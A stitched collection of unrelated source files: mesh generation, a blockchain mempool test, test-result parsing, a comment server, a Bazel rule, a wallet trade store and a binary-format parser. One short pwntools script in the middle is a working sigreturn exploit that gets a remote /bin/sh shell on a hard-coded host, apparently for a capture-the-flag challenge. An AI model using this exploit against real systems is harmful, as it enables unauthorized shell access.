with pytest.raises(ValueError):
api.standings(date=date.today(), season=Season(end=2018))
|
the-stack_0_6208 | import pygmsh as pg
from params import height, width, dist_center, inlet_width, inlet_depth, line_sep, ymin1, ymin2
from params import INMOUTH1, INMOUTH2, OUTMOUTH1, OUTMOUTH2, INLET1, INLET2, OUTLET1, OUTLET2, WALLS, DOMAIN
def main():
#geom = pg.built_in.Geometry()
size = 0.02;
geom = pg.opencascade.Geometry(
characteristic_length_min=size, characteristic_length_max=size)
main_rect = geom.add_rectangle([0.0, 0.0, 0.0], width, height)
mouth_inlet1 = geom.add_rectangle([-inlet_depth, ymin1, 0.0], inlet_depth, inlet_width)
mouth_inlet2 = geom.add_rectangle([-inlet_depth, ymin2, 0.0], inlet_depth, inlet_width)
mouth_outlet1 = geom.add_rectangle([width, ymin1, 0.0], inlet_depth, inlet_width)
mouth_outlet2 = geom.add_rectangle([width, ymin2, 0.0], inlet_depth, inlet_width)
print("ymin1 :{}".format(ymin1))
print("ymin2 :{}".format(ymin2))
geom.add_physical(mouth_inlet1, INMOUTH1)
geom.add_physical(mouth_inlet2, INMOUTH2)
geom.add_physical(mouth_outlet1, OUTMOUTH1)
geom.add_physical(mouth_outlet2, OUTMOUTH2)
geom.add_physical([main_rect], DOMAIN)
heat_exchanger = geom.boolean_fragments([main_rect], [mouth_inlet1, mouth_inlet2, mouth_outlet1, mouth_outlet2])
geom.add_raw_code("""vb1[] = Boundary{{Surface{{ {0} }};}};
vb2[] = Boundary{{Surface{{ {1} }};}};
vb3[] = Boundary{{Surface{{ {2} }};}};
vb4[] = Boundary{{Surface{{ {3} }};}};
vb0[] = Boundary{{Surface{{ {4} }};}};"""
.format(mouth_inlet1.id,
mouth_inlet2.id,
mouth_outlet1.id,
mouth_outlet2.id,
main_rect.id
))
geom.add_raw_code("""Physical Curve({0}) = {{vb0[],
vb1[0], vb1[2],
vb2[0], vb2[2],
vb3[0], vb3[2],
vb4[0], vb4[2]}};"""
.format(WALLS)
)
geom.add_raw_code("Physical Curve({0}) -= {{-vb1[1], -vb2[1], -vb3[3], -vb4[3]}};\n \
Physical Curve({1}) = {{vb1[3]}};\n \
Physical Curve({2}) = {{vb3[1]}};\n \
Physical Curve({3}) = {{vb2[3]}};\n \
Physical Curve({4}) = {{vb4[1]}};"
.format(WALLS, INLET1, OUTLET1, INLET2, OUTLET2))
mesh = pg.generate_mesh(geom, geo_filename="2D_mesh.geo")
import meshio
meshio.write("2D_mesh_heat_exchanger.vtk", mesh)
if __name__ == '__main__':
main()
|
the-stack_0_6209 | #!/usr/bin/env python2
# Copyright (c) 2014-2015 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test resurrection of mined transactions when
# the blockchain is re-organized.
#
from test_framework.test_framework import FatbitTestFramework
from test_framework.util import *
# Create one-input, one-output, no-fee transaction:
class MempoolCoinbaseTest(FatbitTestFramework):
def setup_network(self):
# Just need one node for this test
args = ["-checkmempool", "-debug=mempool"]
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, args))
self.is_network_split = False
def create_tx(self, from_txid, to_address, amount):
inputs = [{ "txid" : from_txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
signresult = self.nodes[0].signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
def run_test(self):
node0_address = self.nodes[0].getnewaddress()
# Spend block 1/2/3's coinbase transactions
# Mine a block.
# Create three more transactions, spending the spends
# Mine another block.
# ... make sure all the transactions are confirmed
# Invalidate both blocks
# ... make sure all the transactions are put back in the mempool
# Mine a new block
# ... make sure all the transactions are confirmed again.
b = [ self.nodes[0].getblockhash(n) for n in range(1, 4) ]
coinbase_txids = [ self.nodes[0].getblock(h)['tx'][0] for h in b ]
spends1_raw = [ self.create_tx(txid, node0_address, 50) for txid in coinbase_txids ]
spends1_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends1_raw ]
blocks = []
blocks.extend(self.nodes[0].generate(1))
spends2_raw = [ self.create_tx(txid, node0_address, 49.99) for txid in spends1_id ]
spends2_id = [ self.nodes[0].sendrawtransaction(tx) for tx in spends2_raw ]
blocks.extend(self.nodes[0].generate(1))
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
# Use invalidateblock to re-org back; all transactions should
# end up unconfirmed and back in the mempool
for node in self.nodes:
node.invalidateblock(blocks[0])
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set(spends1_id+spends2_id))
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] == 0)
# Generate another block, they should all get mined
self.nodes[0].generate(1)
# mempool should be empty, all txns confirmed
assert_equal(set(self.nodes[0].getrawmempool()), set())
for txid in spends1_id+spends2_id:
tx = self.nodes[0].gettransaction(txid)
assert(tx["confirmations"] > 0)
if __name__ == '__main__':
MempoolCoinbaseTest().main()
|
the-stack_0_6214 | # Copyright 2020 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module is for processing test results from resultdb"""
import base64
import logging
from collections import defaultdict
from common.findit_http_client import FinditHttpClient
from go.chromium.org.luci.resultdb.proto.v1 import test_result_pb2
from infra_api_clients import http_client_util
from libs.test_results.base_test_results import BaseTestResults
from libs.test_results.classified_test_results import ClassifiedTestResults
from services import resultdb
_FAILURE_STATUSES = [
test_result_pb2.TestStatus.FAIL, test_result_pb2.TestStatus.CRASH,
test_result_pb2.TestStatus.ABORT
]
_FINDIT_HTTP_CLIENT = FinditHttpClient()
class ResultDBTestType(object):
OTHER = 'OTHER'
GTEST = 'GTEST'
BLINK = 'BLINK'
# TODO (crbug/981066): Implement this
# pylint: disable=abstract-method
class ResultDBTestResults(BaseTestResults):
def __init__(self, test_results, partial_result=False):
"""Creates a ResultDBTestResults object from resultdb test results
Arguments:
test_results: Array of luci.resultdb.v1.TestResult object
partial_result: False if the results are from a single shard, True if
the results are from all shards
"""
self.partial_result = partial_result
self.test_results = ResultDBTestResults.group_test_results_by_test_name(
test_results)
def GetFailedTestsInformation(self):
failed_test_log = {}
reliable_failed_tests = {}
for test_name, result in self.test_results.items():
if result["reliable_failure"]:
test_type = result["test_type"]
# TODO(crbug.com/981066): Consider running this in parallel
real_logs = map(
lambda l: ResultDBTestResults.get_detailed_failure_log(
test_type, l), result["failure_logs"])
merged_test_log = '\n'.join(real_logs)
failed_test_log[test_name] = base64.b64encode(merged_test_log)
reliable_failed_tests[test_name] = test_name
return failed_test_log, reliable_failed_tests
@property
def contains_all_tests(self):
"""
True if the test result is merged results for all shards; False if it's a
partial result.
"""
return not self.partial_result
def test_type(self):
for _, result in self.test_results.items():
return result["test_type"]
return ResultDBTestType.OTHER
def GetClassifiedTestResults(self):
"""Parses ResultDB results, counts and classifies test results.
Also counts number of expected and unexpected results for each test.
Returns:
(ClassifiedTestResults) An object with information for each test:
* total_run: total number of runs,
* num_expected_results: total number of runs with expected results,
* num_unexpected_results: total number of runs with unexpected results,
* results: classified test results in 5 groups: passes, failures, skips,
unknowns, notruns.
"""
classified_results = ClassifiedTestResults()
for test_name, test_info in self.test_results.items():
# We don't care about the tests that were skipped on purpose
if (test_info["num_passed"] == 0 and test_info["num_failed"] == 0 and
test_info["num_crashed"] == 0 and test_info["num_aborted"] == 0 and
test_info["num_notrun"] == 0 and test_info["num_unspecified"] == 0):
continue
classified_results[test_name].total_run = test_info["total_run"]
classified_results[test_name].num_expected_results = test_info[
"num_expected_results"]
classified_results[test_name].num_unexpected_results = test_info[
"num_unexpected_results"]
if test_info["num_passed"]:
classified_results[test_name].results.passes['PASS'] = test_info[
"num_passed"]
if test_info["num_failed"]:
classified_results[test_name].results.failures['FAIL'] = test_info[
"num_failed"]
if test_info["num_crashed"]:
classified_results[test_name].results.failures['CRASH'] = test_info[
"num_crashed"]
if test_info["num_aborted"]:
classified_results[test_name].results.failures['ABORT'] = test_info[
"num_aborted"]
if test_info["num_skipped"]:
classified_results[test_name].results.skips['SKIP'] = test_info[
"num_skipped"]
if test_info["num_notrun"]:
classified_results[test_name].results.notruns['SKIP'] = test_info[
"num_notrun"]
if test_info["num_unspecified"]:
classified_results[test_name].results.unknowns[
'UNSPECIFIED'] = test_info["num_unspecified"]
return classified_results
def GetTestLocation(self, test_name):
"""Gets test location for a specific test.
Returns: A tuple containing
* A dictionary of {
"line": line number of the test
"file": file path to the test
}
* A possible error string
"""
location = self.test_results.get(test_name, {}).get('test_location')
if not location:
return None, 'test location not found'
return location, None
def DoesTestExist(self, test_name):
return test_name in self.test_results
def IsTestResultUseful(self):
return len(self.test_results) > 0
@staticmethod
def group_test_results_by_test_name(test_results):
# pylint: disable=line-too-long
"""Returns a dictionary of
{
<test_name>:{
"reliable_failure": whether the test fail consistently
"failure_logs": array of dictionary {
"name": test result name (e.g. invocations/task-chromium-swarm.appspot.com-508dcba4306cae11/tests/ninja:%2F%2Fgpu:gl_tests%2FSharedImageGLBackingProduceDawnTest.Basic/results/c649f775-00777)
"summary_html": summary_html of a run
}
"test_type": type of test
"test_location": location of the test
"total_run": number of runs for the test
"num_expected_results": number of expected runs
"num_unexpected_results": number of unexpected runs
"num_passed": number of passed results
"num_failed": number of failed results
"num_crashed": number of crashed results
"num_aborted": number of aborted results
"num_skipped": number of skipped results
"num_notrun": number of not run results
"num_unspecified": number of unspecified results
}
}
Arguments:
test_results: Array of ResultDB TestResult object
"""
results = defaultdict(dict)
for test_result in test_results:
test_name = ResultDBTestResults.test_name_for_test_result(test_result)
if not test_name:
continue
is_failure = ResultDBTestResults.is_failure(test_result)
log = {
"name":
test_result.name,
"summary_html":
ResultDBTestResults.summary_html_for_test_result(test_result)
}
if not results.get(test_name):
results[test_name] = {
"reliable_failure":
is_failure,
"failure_logs": [log] if is_failure else [],
"test_type":
ResultDBTestResults.test_type_for_test_result(test_result),
"test_location":
ResultDBTestResults.test_location_for_test_result(test_result),
"total_run":
0,
"num_expected_results":
0,
"num_unexpected_results":
0,
"num_passed":
0,
"num_failed":
0,
"num_crashed":
0,
"num_aborted":
0,
"num_skipped":
0,
"num_notrun":
0,
"num_unspecified":
0,
}
else:
results[test_name]["reliable_failure"] = results[test_name][
"reliable_failure"] and is_failure
if is_failure:
results[test_name]["failure_logs"].append(log)
ResultDBTestResults._update_classified_test_results(
results[test_name], test_result)
return results
@staticmethod
def _update_classified_test_results(classified_results, test_result):
"""Update classified_results with a test result object
Arguments:
classified_results: A dictionary containing results for a test ID
test_result: A luci.resultdb.v1.TestResult object
"""
classified_results["total_run"] += 1
if test_result.expected:
classified_results["num_expected_results"] += 1
else:
classified_results["num_unexpected_results"] += 1
if test_result.status == test_result_pb2.TestStatus.PASS:
classified_results["num_passed"] += 1
elif test_result.status == test_result_pb2.TestStatus.FAIL:
classified_results["num_failed"] += 1
elif test_result.status == test_result_pb2.TestStatus.CRASH:
classified_results["num_crashed"] += 1
elif test_result.status == test_result_pb2.TestStatus.ABORT:
classified_results["num_aborted"] += 1
elif test_result.status == test_result_pb2.TestStatus.SKIP:
if test_result.expected:
classified_results["num_skipped"] += 1
else:
classified_results["num_notrun"] += 1
else:
classified_results["num_unspecified"] += 1
@staticmethod
def is_failure(test_result):
return test_result.status in _FAILURE_STATUSES and not test_result.expected
@staticmethod
def test_name_for_test_result(test_result):
"""Returns the test name for luci.resultdb.v1.TestResult object
Arguments:
test_result: A luci.resultdb.v1.TestResult object
"""
for tag in test_result.tags or []:
if tag.key == "test_name":
return tag.value
logging.warning("There is no test name for test_id: %s",
test_result.test_id)
return None
@staticmethod
def summary_html_for_test_result(test_result):
return test_result.summary_html or ""
@staticmethod
def test_type_for_test_result(test_result):
"""Return a ResultDBTestType for test_result"""
if "blink_web_tests" in test_result.test_id:
return ResultDBTestType.BLINK
if test_result.tags:
for tag in test_result.tags:
if "gtest" in tag.key:
return ResultDBTestType.GTEST
return ResultDBTestType.OTHER
@staticmethod
def test_location_for_test_result(test_result):
"""Return test location for test_result"""
if (not test_result.test_metadata or
not test_result.test_metadata.location or
not test_result.test_metadata.location.file_name):
return None
return {
"line": test_result.test_metadata.location.line,
"file": test_result.test_metadata.location.file_name
}
@staticmethod
def get_detailed_failure_log(test_type, failure_log):
"""Gets the detailed failure log from artifact if possible
For gtest, if there is stack_trace artifact, download the content of the
artifact. Otherwise, just return summaryHTML
Argument:
test_type: ResultDBTestType
failure_log: Dictionary of {"name":..., "summary_html":...}
Returns:
A string for the detailed failure logs
"""
summary_html = failure_log["summary_html"]
if test_type != ResultDBTestType.GTEST:
return summary_html
# We only check for "stack_trace" artifact if "stack_trace" presents in
# summary_html
if "stack_trace" not in summary_html:
return summary_html
test_result_name = failure_log["name"]
artifacts = resultdb.list_artifacts(test_result_name) or []
stack_trace_artifact = next(
(a for a in artifacts if a.artifact_id == "stack_trace"), None)
if not stack_trace_artifact:
return summary_html
fetch_url = stack_trace_artifact.fetch_url
content, error = http_client_util.SendRequestToServer(
fetch_url, _FINDIT_HTTP_CLIENT)
if not error:
return content
logging.warning("Unable to fetch content from %s: %s", fetch_url, error)
return summary_html
|
the-stack_0_6216 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2012-2014 Martin Zimmermann.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# Isso – a lightweight Disqus alternative
from __future__ import print_function, unicode_literals
import pkg_resources
dist = pkg_resources.get_distribution("isso")
# check if exectuable is `isso` and gevent is available
import sys
if sys.argv[0].startswith("isso"):
try:
import gevent.monkey
gevent.monkey.patch_all()
except ImportError:
pass
import os
import errno
import logging
import tempfile
from os.path import dirname, join
from argparse import ArgumentParser
from functools import partial, reduce
import pkg_resources
werkzeug = pkg_resources.get_distribution("werkzeug")
from itsdangerous import URLSafeTimedSerializer
from werkzeug.routing import Map
from werkzeug.exceptions import HTTPException, InternalServerError
from werkzeug.middleware.shared_data import SharedDataMiddleware
from werkzeug.local import Local, LocalManager
from werkzeug.serving import run_simple
from werkzeug.middleware.proxy_fix import ProxyFix
from werkzeug.middleware.profiler import ProfilerMiddleware
local = Local()
local_manager = LocalManager([local])
from isso import config, db, db_psql, migrate, wsgi, ext, views
from isso.core import ThreadedMixin, ProcessMixin, uWSGIMixin
from isso.wsgi import origin, urlsplit
from isso.utils import http, JSONRequest, html, hash
from isso.views import comments
from isso.ext.notifications import Stdout, SMTP
logging.getLogger('werkzeug').setLevel(logging.WARN)
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s: %(message)s")
logger = logging.getLogger("isso")
class ProxyFixCustom(ProxyFix):
def __init__(self, app):
# This is needed for werkzeug.wsgi.get_current_url called in isso/views/comments.py
# to work properly when isso is hosted under a sub-path
# cf. https://werkzeug.palletsprojects.com/en/1.0.x/middleware/proxy_fix/
super().__init__(app, x_prefix=1)
class Isso(object):
def __init__(self, conf):
self.conf = conf
db_type = conf.get('general', 'db-type')
if db_type == 'psql':
self.db = db_psql.PSQL(conf.get('general', 'dbpath'), conf)
else:
self.db = db.SQLite3(conf.get('general', 'dbpath'), conf)
self.signer = URLSafeTimedSerializer(
self.db.preferences.get("session-key"))
self.markup = html.Markup(conf.section('markup'))
self.hasher = hash.new(conf.section("hash"))
super(Isso, self).__init__(conf)
subscribers = []
smtp_backend = False
for backend in conf.getlist("general", "notify"):
if backend == "stdout":
subscribers.append(Stdout(None))
elif backend in ("smtp", "SMTP"):
smtp_backend = True
else:
logger.warn("unknown notification backend '%s'", backend)
if smtp_backend or conf.getboolean("general", "reply-notifications"):
subscribers.append(SMTP(self))
self.signal = ext.Signal(*subscribers)
self.urls = Map()
views.Info(self)
views.Metrics(self)
comments.API(self, self.hasher)
def render(self, text):
return self.markup.render(text)
def sign(self, obj):
return self.signer.dumps(obj)
def unsign(self, obj, max_age=None):
return self.signer.loads(obj, max_age=max_age or self.conf.getint('general', 'max-age'))
def dispatch(self, request):
local.request = request
local.host = wsgi.host(request.environ)
local.origin = origin(self.conf.getiter(
"general", "host"))(request.environ)
adapter = self.urls.bind_to_environ(request.environ)
try:
handler, values = adapter.match()
except HTTPException as e:
return e
else:
try:
response = handler(request.environ, request, **values)
except HTTPException as e:
return e
except Exception:
logger.exception("%s %s", request.method,
request.environ["PATH_INFO"])
return InternalServerError()
else:
return response
def wsgi_app(self, environ, start_response):
response = self.dispatch(JSONRequest(environ))
return response(environ, start_response)
def __call__(self, environ, start_response):
return self.wsgi_app(environ, start_response)
def make_app(conf=None, threading=True, multiprocessing=False, uwsgi=False):
if not any((threading, multiprocessing, uwsgi)):
raise RuntimeError("either set threading, multiprocessing or uwsgi")
if threading:
class App(Isso, ThreadedMixin):
pass
elif multiprocessing:
class App(Isso, ProcessMixin):
pass
else:
class App(Isso, uWSGIMixin):
pass
isso = App(conf)
# check HTTP server connection
for host in conf.getiter("general", "host"):
with http.curl('HEAD', host, '/', 5) as resp:
if resp is not None:
logger.info("connected to %s", host)
break
else:
logger.warn("unable to connect to your website, Isso will probably not "
"work correctly. Please make sure, Isso can reach your "
"website via HTTP(S).")
wrapper = [local_manager.make_middleware]
if isso.conf.getboolean("server", "profile"):
wrapper.append(partial(ProfilerMiddleware,
sort_by=("cumulative", ), restrictions=("isso/(?!lib)", 10)))
wrapper.append(partial(SharedDataMiddleware, exports={
'/js': join(dirname(__file__), 'js/'),
'/css': join(dirname(__file__), 'css/'),
'/img': join(dirname(__file__), 'img/'),
'/demo': join(dirname(__file__), 'demo/')
}))
wrapper.append(partial(wsgi.CORSMiddleware,
origin=origin(isso.conf.getiter("general", "host")),
allowed=("Origin", "Referer", "Content-Type"),
exposed=("X-Set-Cookie", "Date")))
wrapper.extend([wsgi.SubURI, ProxyFixCustom])
if werkzeug.version.startswith("0.8"):
wrapper.append(wsgi.LegacyWerkzeugMiddleware)
return reduce(lambda x, f: f(x), wrapper, isso)
def main():
parser = ArgumentParser(description="a blog comment hosting service")
subparser = parser.add_subparsers(help="commands", dest="command")
parser.add_argument('--version', action='version',
version='%(prog)s ' + dist.version)
parser.add_argument("-c", dest="conf", default="/etc/isso.conf",
metavar="/etc/isso.conf", help="set configuration file")
imprt = subparser.add_parser('import', help="import Disqus XML export")
imprt.add_argument("dump", metavar="FILE")
imprt.add_argument("-n", "--dry-run", dest="dryrun", action="store_true",
help="perform a trial run with no changes made")
imprt.add_argument("-t", "--type", dest="type", default=None,
choices=["disqus", "wordpress", "generic"], help="export type")
imprt.add_argument("--empty-id", dest="empty_id", action="store_true",
help="workaround for weird Disqus XML exports, #135")
# run Isso as stand-alone server
subparser.add_parser("run", help="run server")
args = parser.parse_args()
conf = config.load(
join(dist.location, dist.project_name, "defaults.ini"), args.conf)
if args.command == "import":
conf.set("guard", "enabled", "off")
if args.dryrun:
xxx = tempfile.NamedTemporaryFile()
dbpath = xxx.name
else:
dbpath = conf.get("general", "dbpath")
mydb = db.SQLite3(dbpath, conf)
migrate.dispatch(args.type, mydb, args.dump, args.empty_id)
sys.exit(0)
if conf.get("general", "log-file"):
handler = logging.FileHandler(conf.get("general", "log-file"))
logger.addHandler(handler)
logging.getLogger("werkzeug").addHandler(handler)
logger.propagate = False
logging.getLogger("werkzeug").propagate = False
if not any(conf.getiter("general", "host")):
logger.error("No website(s) configured, Isso won't work.")
sys.exit(1)
if conf.get("server", "listen").startswith("http://"):
host, port, _ = urlsplit(conf.get("server", "listen"))
try:
from gevent.pywsgi import WSGIServer
WSGIServer((host, port), make_app(conf)).serve_forever()
except ImportError:
run_simple(host, port, make_app(conf), threaded=True,
use_reloader=conf.getboolean('server', 'reload'))
else:
sock = conf.get("server", "listen").partition("unix://")[2]
try:
os.unlink(sock)
except OSError as ex:
if ex.errno != errno.ENOENT:
raise
wsgi.SocketHTTPServer(sock, make_app(conf)).serve_forever()
|
the-stack_0_6217 | # Copyright 2018 The Bazel Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Coverage report generation."""
load("@bazel_tools//tools/build_defs/repo:git.bzl", "new_git_repository")
_LCOV_BUILD_FILE_CONTENT = """
filegroup(
name = "bin",
srcs = glob(["bin/**/*"]),
visibility = ["//visibility:public"],
)
"""
def bazel_coverage_report_repositories():
"""Add to the WORKSPACE external dependencies needed by the generator.
"""
if "lcov" not in native.existing_rules():
new_git_repository(
name = "lcov",
build_file_content = _LCOV_BUILD_FILE_CONTENT,
commit = "a5dd9529f9232b8d901a4d6eb9ae54cae179e5b3",
remote = "https://github.com/linux-test-project/lcov.git",
)
|
the-stack_0_6218 | from typing import List, Optional
import aiosqlite
from aloe.types.blockchain_format.sized_bytes import bytes32
from aloe.types.mempool_inclusion_status import MempoolInclusionStatus
from aloe.util.db_wrapper import DBWrapper
from aloe.util.errors import Err
from aloe.util.ints import uint8, uint32
from aloe.wallet.trade_record import TradeRecord
from aloe.wallet.trading.trade_status import TradeStatus
class TradeStore:
"""
TradeStore stores trading history.
"""
db_connection: aiosqlite.Connection
cache_size: uint32
db_wrapper: DBWrapper
@classmethod
async def create(cls, db_wrapper: DBWrapper, cache_size: uint32 = uint32(600000)):
self = cls()
self.cache_size = cache_size
self.db_wrapper = db_wrapper
self.db_connection = db_wrapper.db
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute("pragma synchronous=2")
await self.db_connection.execute(
(
"CREATE TABLE IF NOT EXISTS trade_records("
" trade_record blob,"
" trade_id text PRIMARY KEY,"
" status int,"
" confirmed_at_index int,"
" created_at_time bigint,"
" sent int)"
)
)
await self.db_connection.execute(
"CREATE INDEX IF NOT EXISTS trade_confirmed_index on trade_records(confirmed_at_index)"
)
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_status on trade_records(status)")
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS trade_id on trade_records(trade_id)")
await self.db_connection.commit()
return self
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM trade_records")
await cursor.close()
await self.db_connection.commit()
async def add_trade_record(self, record: TradeRecord, in_transaction) -> None:
"""
Store TradeRecord into DB
"""
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(
"INSERT OR REPLACE INTO trade_records VALUES(?, ?, ?, ?, ?, ?)",
(
bytes(record),
record.trade_id.hex(),
record.status,
record.confirmed_at_index,
record.created_at_time,
record.sent,
),
)
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
async def set_status(self, trade_id: bytes32, status: TradeStatus, in_transaction: bool, index: uint32 = uint32(0)):
"""
Updates the status of the trade
"""
current: Optional[TradeRecord] = await self.get_trade_record(trade_id)
if current is None:
return None
confirmed_at_index = current.confirmed_at_index
if index != 0:
confirmed_at_index = index
tx: TradeRecord = TradeRecord(
confirmed_at_index=confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=current.sent,
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=uint32(status.value),
sent_to=current.sent_to,
)
await self.add_trade_record(tx, in_transaction)
async def increment_sent(
self,
id: bytes32,
name: str,
send_status: MempoolInclusionStatus,
err: Optional[Err],
) -> bool:
"""
Updates trade sent count (Full Node has received spend_bundle and sent ack).
"""
current: Optional[TradeRecord] = await self.get_trade_record(id)
if current is None:
return False
sent_to = current.sent_to.copy()
err_str = err.name if err is not None else None
append_data = (name, uint8(send_status.value), err_str)
# Don't increment count if it's already sent to this peer
if append_data in sent_to:
return False
sent_to.append(append_data)
tx: TradeRecord = TradeRecord(
confirmed_at_index=current.confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=uint32(current.sent + 1),
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=current.status,
sent_to=sent_to,
)
await self.add_trade_record(tx, False)
return True
async def set_not_sent(self, id: bytes32):
"""
Updates trade sent count to 0.
"""
current: Optional[TradeRecord] = await self.get_trade_record(id)
if current is None:
return None
tx: TradeRecord = TradeRecord(
confirmed_at_index=current.confirmed_at_index,
accepted_at_time=current.accepted_at_time,
created_at_time=current.created_at_time,
my_offer=current.my_offer,
sent=uint32(0),
spend_bundle=current.spend_bundle,
tx_spend_bundle=current.tx_spend_bundle,
additions=current.additions,
removals=current.removals,
trade_id=current.trade_id,
status=uint32(TradeStatus.PENDING_CONFIRM.value),
sent_to=[],
)
await self.add_trade_record(tx, False)
async def get_trade_record(self, trade_id: bytes32) -> Optional[TradeRecord]:
"""
Checks DB for TradeRecord with id: id and returns it.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE trade_id=?", (trade_id.hex(),))
row = await cursor.fetchone()
await cursor.close()
if row is not None:
record = TradeRecord.from_bytes(row[0])
return record
return None
async def get_trade_record_with_status(self, status: TradeStatus) -> List[TradeRecord]:
"""
Checks DB for TradeRecord with id: id and returns it.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE status=?", (status.value,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_not_sent(self) -> List[TradeRecord]:
"""
Returns the list of trades that have not been received by full node yet.
"""
cursor = await self.db_connection.execute(
"SELECT * from trade_records WHERE sent<? and confirmed=?",
(
4,
0,
),
)
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_all_unconfirmed(self) -> List[TradeRecord]:
"""
Returns the list of all trades that have not yet been confirmed.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed=?", (0,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_all_trades(self) -> List[TradeRecord]:
"""
Returns all stored trades.
"""
cursor = await self.db_connection.execute("SELECT * from trade_records")
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def get_trades_above(self, height: uint32) -> List[TradeRecord]:
cursor = await self.db_connection.execute("SELECT * from trade_records WHERE confirmed_at_index>?", (height,))
rows = await cursor.fetchall()
await cursor.close()
records = []
for row in rows:
record = TradeRecord.from_bytes(row[0])
records.append(record)
return records
async def rollback_to_block(self, block_index):
# Delete from storage
cursor = await self.db_connection.execute(
"DELETE FROM trade_records WHERE confirmed_at_index>?", (block_index,)
)
await cursor.close()
await self.db_connection.commit()
|
the-stack_0_6220 | from pwn import *
context.arch = 'amd64'
host = '5.101.72.234'
port = 33074
execve_syscall_num = 59
bin_sh_addr = 0x402000
syscall = 0x40100B
sigret = 0x401004
if __name__ == "__main__":
#p = process( "./main" )
p = remote( host, port )
paylaod = 'a' * 72
paylaod += p64( sigret )
sigFrame = SigreturnFrame( kernel = "amd64" )
sigFrame.rax = execve_syscall_num
sigFrame.rdi = bin_sh_addr
sigFrame.rsi = 0
sigFrame.rdx = 0
sigFrame.rip = syscall
paylaod += str( sigFrame )
p.send( paylaod + "\n" )
p.interactive()
|
the-stack_0_6222 | import dataclasses
import typing
from typing import Optional
import construct
from construct import (
Struct, PrefixedArray, Int64ul, Int32ul, Hex, Construct, Computed, Array, Tell,
Aligned, FocusedSeq, Rebuild, Seek, Pointer, Prefixed, GreedyBytes,
)
from mercury_engine_data_structures import dread_data
from mercury_engine_data_structures.construct_extensions.alignment import AlignTo
from mercury_engine_data_structures.construct_extensions.misc import Skip
from mercury_engine_data_structures.formats.base_resource import BaseResource, NameOrAssetId, resolve_asset_id, AssetId
from mercury_engine_data_structures.game_check import Game
Construct_AssetId = Hex(Int64ul)
def offset_for(con: Struct, name: str):
result = 0
for sc in con.subcons:
sc = typing.cast(Construct, sc)
if sc.name == name:
return result
result += sc.sizeof()
raise construct.ConstructError(f"Unknown field: {name}")
def header_field(field_name: str):
offset = offset_for(FileEntry, field_name)
def result(ctx):
parents = [ctx]
while "_" in parents[-1]:
parents.append(parents[-1]["_"])
start_headers = None
index = None
for c in reversed(parents):
if "_start_headers" in c:
start_headers = c["_start_headers"]
break
for c in parents:
if "_resource_index" in c:
